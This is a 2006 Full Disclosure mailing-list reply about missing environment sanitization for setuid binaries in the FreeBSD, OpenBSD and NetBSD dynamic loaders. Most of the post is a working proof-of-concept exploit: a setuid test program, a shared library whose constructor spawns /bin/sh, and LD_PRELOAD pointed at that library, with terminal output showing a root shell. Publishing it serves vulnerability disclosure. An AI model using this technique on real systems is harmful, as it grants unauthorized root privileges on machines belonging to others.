Full Disclosure mailing list archives
Re: Lack of environment sanitization in the FreeBSD, OpenBSD, NetBSD dynamic loaders.
From: "Tyop?" <tyoptyop () gmail com>
Date: Wed, 22 Nov 2006 23:04:12 +0100
On 11/22/06, Tyop? <tyoptyop () gmail com> wrote:
On 11/22/06, In Cognito <defend.the.world () gmail com> wrote:Impact: Serious. May lead to privilege escalation. A class of security vulnerabilities has resurfaced in the dynamic loaders of FreeBSD, OpenBSD, and NetBSD in the sanitization of environment variables for suid and sgid binaries. Due to either badly implemented sanitization or a lack of it, a setuid binary may execute other processes with a tainted environment. [...] Have fun! Stay safe!Fun. Not "perfectly" safe. My experience : %id uid=0(root) gid=0(wheel) groups=0(wheel), 5(operator) %cat vuln.c main() { setuid(0); execl("/usr/bin/id","id",0); } %cc vuln.c -o vuln && chmod 4711 ./vuln %exitiduid=1001(tyop) gid=1001(tyop) groups=1001(tyop)ls -l vuln-rws--x--x 1 root tyop 4827 Nov 22 22:46 vulncat tyop.c__attribute__ ((constructor)) main() { printf("[+] Hello from shared library land\n"); execle("/bin/sh","sh",0,0); }cc -shared -o lib.so tyop.c setenv LD_PRELOAD "/home/tyop/test/lib.so" ./vuln[+] Hello from shared library land # id uid=0(root) gid=0(wheel) egid=1001(tyop) groups=1001(tyop) # echo "It works on `uname -sr`" It works on FreeBSD 7.0-CURRENT-200609 # Have a nice day.
# echo "It works with vuln static too" It works with vuln static too. (sry for double post) -- Tyop? _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: Lack of environment sanitization in the FreeBSD, OpenBSD, NetBSD dynamic loaders. Tyop? (Nov 22)
- Re: Lack of environment sanitization in the FreeBSD, OpenBSD, NetBSD dynamic loaders. Tyop? (Nov 22)